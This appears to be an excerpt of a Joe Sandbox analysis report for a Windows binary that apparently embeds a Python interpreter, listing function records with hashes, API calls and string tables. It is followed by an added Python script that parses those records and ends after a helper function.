• Instruction ID: 9e601518f5a6b0b002dad5668a8733424aa08585c56ca06e0a9f930c2eb9cb6b
• Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction Fuzzy Hash: 6F510723B0D26586FB289F2D980167A6291BF44BA5F194735DF7D83BE5DF3CE4018620

APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
• Instruction ID: 9348fd7082fa0307d0cc518e5fe57c94b1d6325e0784e436dff23ff2b4a4699b
• Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
• Instruction Fuzzy Hash: 8211C463A0CAA181DA208B2AE8141696361AB45FF4F544335EF7D8BBF9DE7CE0518740

APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
• GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
• Instruction ID: 3613575286240467edad9f89c37e75a443f63643d04c36f8c43fe361a08c654f
• Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
• Instruction Fuzzy Hash: D6E08C52F0D20643FF0A6FFAA8455381261AF88B02F444038CB0DC27B1EE2C78828710

APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF6B751A9D5,?,?,00000000,00007FF6B751AA8A), ref: 00007FF6B751ABC6
• GetLastError.KERNEL32(?,?,?,00007FF6B751A9D5,?,?,00000000,00007FF6B751AA8A), ref: 00007FF6B751ABD0
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction ID: 407f86b3c7839f6f1954c1288e880ec10a226cb763a7050fad2a332fc2f14047
• Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction Fuzzy Hash: 7421AB13F1C6E241FA669BA9949037D12929F847A5F044239DB1EC7FF5DE6CF8814300

APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction ID: 6c5d8e89f1f6e1cb93ead1f22dc2cae22c4fa37c2040123e0360d7510bde1ba4
• Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction Fuzzy Hash: 9C419A3391C25587EA259F2DA54027973A1EB5AB92F100235EBCEC3AE1CF6CE4438B51

APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 0452e3aa7aca29920b4941156e71ee71ec49b143be23cefe434c899149b2eae9
• Instruction ID: 37860710e2ad52b969d1663f6b44e6b6ee08945183f3051cc32d536a3ba7d339
• Opcode Fuzzy Hash: 0452e3aa7aca29920b4941156e71ee71ec49b143be23cefe434c899149b2eae9
• Instruction Fuzzy Hash: 2421D622B1C66146FA109B2A6914BFA9781BF45BD8F884430EF4C97B96CE7DF042C300

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                              • Instruction ID: 1e28fe687b4b102906b4916518218b98f1f38c22012c395fdba5b578c0066d66
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF316123A1C62285F7116F5D884137C26A0AF80FA6F415235EB5D97BF2CE7CF4428711
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction ID: a68db4340b1205cab7b89a5b056d592e21b74a6ffdba87d9efdedfeabd7a09f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16217A76A087968AEB258F68C4807FC33A4FB44719F44463AD76D86EE5DF38D584CB40
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction ID: 1ed75aa72f50d236d9686b0a6e597cd7aba8c1c411a2243c41135f4c077dd308
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5116023E1C66282EA61AF19940027EA264BF85B85F444536FB8CD7FB6DF3DE4418700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction ID: be48282a8cd2cc7da7c5f69b13c750ed32804945e68f4a7ac804d1c504c0b065
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3218433A1CA4586EB618F1CD48037976A0FB94B54F244234EB9EC7AE9DF3CD4118B00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction ID: a84ba4a718ccd5eed1345ccf01100c65a9825216815a7ae7e20535eea5ef0b15
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D901C422E0C76580EA04DF5A99410B9A691BF85FE1F484631EF5C97FE6CE7CE4028300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF6B7510C90,?,?,?,00007FF6B75122FA,?,?,?,?,?,00007FF6B7513AE9), ref: 00007FF6B751D63A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction ID: 03153f43d82c1e21f5ae14c97fc931c40e7c8e65b3e43365fdf77f0453d9abc4
• Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction Fuzzy Hash: 06F0F892F0DB9645FE645F79584167512905F847A2F080734DF2EC6AE2EE2CA880A610
APIs
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505840
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505852
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505889
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750589B
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058B4
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058C6
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058DF
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058F1
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750590D
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750591F
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750593B
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750594D
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505969
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750597B
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505997
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059A9
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059C5
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction ID: 51059412cc8c27bda031adb8049a171a26fb45d4a4ab3af1fd8e4184feb329f4
• Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction Fuzzy Hash: 2022C367A0DB0792FB56DB5DA824AB423B0FF04789F645039CB5E822B1FF3CB5589244
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
• Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
• Instruction ID: 0390bb774afaf5aadfddf8d483c2a622e12849082b212feeda2442df2b802f7d
• Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
• Instruction Fuzzy Hash: 86B29D73E1C2928BE7658F68D440BFD77A1FB54388F505135DB0A9BAA8DF38B9018B40
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
• Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
• Instruction ID: 1a4b141c3d6f157c2cb759e1018874ba5d70d119d35f8856e0809f4cb67f553a
• Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
• Instruction Fuzzy Hash: DD52B373A1C6A64BE7A48F18D498B7E3BAAFB44344F054139E78A87790DF39D944CB40
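Editor's note, added example (not part of the Joe Sandbox report and not code from the sample): the function records above are easier to triage when parsed into structured data rather than read as a 7,000-line dump. The parser below splits the report text into one record per function (every record ends with its "Instruction Fuzzy Hash" line), extracts the API calls and the `$`-joined "String ID" table, and applies two heuristic labels that are my inference, not something the report states: a function that calls GetProcAddress and carries a string table of `Py*` C-API names together with "Failed to get address for %hs" is the import-resolution step of a loader that embeds a Python interpreter, and the "invalid distance too far back" family of strings is zlib's inflate error table. The sample input is constructed from the three records above, with the Memory Dump Source entries shortened.

```python
"""Parse Joe Sandbox function records (API ID / String ID / fuzzy hash
blocks) into structured objects and flag the embedded-Python loader pattern."""
import re
from dataclasses import dataclass, field

# Constructed sample: three records transcribed from the report section above,
# leading whitespace stripped and the dump lists shortened to one entry.
SAMPLE_REPORT = """\
APIs
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505840
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505852
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505889
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyErr_Print$PyEval_EvalCode$PyMarshal_ReadObjectFromString$Py_InitializeFromConfig$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction Fuzzy Hash: 2022C367A0DB0792FB56DB5DA824AB423B0FF04789F645039CB5E822B1FF3CB5589244
Strings
Memory Dump Source
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid distance too far back$too many length or distance symbols
• API String ID: 0-2665694366
• Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
• Instruction Fuzzy Hash: DD52B373A1C6A64BE7A48F18D498B7E3BAAFB44344F054139E78A87790DF39D944CB40
APIs
Memory Dump Source
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction Fuzzy Hash: 4231FA73609B8586EB609F64E8807AE6374FB84748F44403ADB4E87BA9EF79D548C710
"""

# "• Key: value" metadata line (value may be empty, e.g. "• API ID:")
FIELD_RE = re.compile(r"^• ([A-Za-z ]+?): ?(.*)$")
# "• Api.MODULE(args), ref: ADDR" or "• _crt_func.LIBCMT ref: ADDR"
CALL_RE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*)\),)? ref: ([0-9A-Fa-f]+)$")
# CPython C-API symbol names: Py_..., PyConfig_..., PyErr_..., and so on
PY_SYMBOL_RE = re.compile(r"^Py[A-Za-z]*_\w+$")
# error strings from zlib's inflate(); heuristic marker, my assumption
ZLIB_INFLATE_MARKERS = {"invalid distance too far back",
                        "too many length or distance symbols"}


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)   # (api, module, args, ref)
    fields: dict = field(default_factory=dict)  # "API ID", "String ID", ...

    @property
    def strings(self):
        # Joe Sandbox joins referenced strings with '$'
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def call_names(self):
        return {api for api, _mod, _args, _ref in self.calls}


def parse_records(text):
    """Split report text into FunctionRecords; headings like 'APIs' are skipped."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = CALL_RE.match(line)
        if m:
            cur.calls.append(m.groups())
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            cur.fields[key] = value
            if key == "Instruction Fuzzy Hash":  # last line of every record
                records.append(cur)
                cur = FunctionRecord()
    return records


def python_symbols(rec):
    """C-API names the function resolves, taken from its string table."""
    return sorted(s for s in rec.strings if PY_SYMBOL_RE.match(s))


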